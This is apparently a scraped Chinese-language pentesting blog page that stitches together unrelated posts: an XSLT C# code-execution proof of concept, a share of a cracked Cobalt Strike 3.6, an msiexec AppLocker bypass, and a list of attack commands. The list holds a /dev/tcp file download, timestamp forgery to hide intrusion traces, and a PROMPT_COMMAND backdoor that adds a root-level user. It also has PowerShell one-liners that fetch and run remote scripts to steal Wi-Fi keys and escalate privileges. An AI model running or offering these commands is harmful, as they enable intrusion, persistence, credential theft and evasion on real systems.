From: https://gist.github.com/subTee/e126c6ee847a4d9fcfd7CalcExcel.hta<html> <head> <script> var ob ...
Hack With XSLT
0x00 简介
XSLT全称为拓展样式表转换语言,是一种用于将 XML 文档转换为 XHTML 文档或其他 XML 文档的语言。更多关于XSLT的教程可以参考W3school。关于XSLT的hack技巧之前已经有老师总结了WebShell系列(一)—XML,里面详细介绍了怎么通过xslt构造webshell,并且可以看的出,通过XSLT可以执行很多类型的脚本,前段时间@Casey Smith公开了一个Execute C# From XSLT 的POC,感觉很有趣,所以简单的研究了一下,也就有了此文。
0x01 POC
Casey Smith分享的poc如下:
calc.xslt1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<xsl:stylesheet version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:my="urn:MyModule">
<msxsl:script implements-prefix="my" language="C#">
public void Exec()
{
System.Diagnostics.Process.Start("Calc.exe");
}
</msxsl:script>
<xsl:template match="data">
<result>
<xsl:value-of select="my:Exec()" />
</result>
</xsl:template>
</xsl:stylesheet>
cobaltstrike3.6 破解版
最近cobaltstrike更新到了3.6,所以下载了一下,并向小伙伴进行一下分享。运行截图: 破解以后的使用天数: 使用3.6你将拥有更强大的姿势,比如: 百度云: 链接: 戳我 密码: cjfx
Bypassing Applocker with msiexec
msf生成MSI:1
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi
命令行运行:1
msiexec /quiet /i cacl.msi
Commands 搜集(持续更新)
Linux
Linux反弹shell后,方便的交互:1
python -c 'import pty; pty.spawn("/bin/bash")'
无python时:1
expect -c 'spawn bash;interact'
无wget nc等下载工具时下载文件1
exec 5<>/dev/tcp/sec-lab.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl
修改上传文件时间戳(掩盖入侵痕迹)1
touch -r 老文件时间戳 新文件时间戳
利用BASH提权
这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户
$PROMPT_COMMAND 利用这个变量保存了在主提示符$PS1显示之前需要执行的命令
导入:1
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”
lsof 命令1
2
3
4
5
6
7
8lsof 1.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i [i] 用以显示符合条件的进程情况
SSH端口转发
下面文章详细描述了3种方式转发
http://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html
图片马1
Exiftool “-comment<=raj.php” 1.png
Windows
Powershell 相关
获取无线密码:1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1');Get-Wlan-Keys "
提权加账号1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"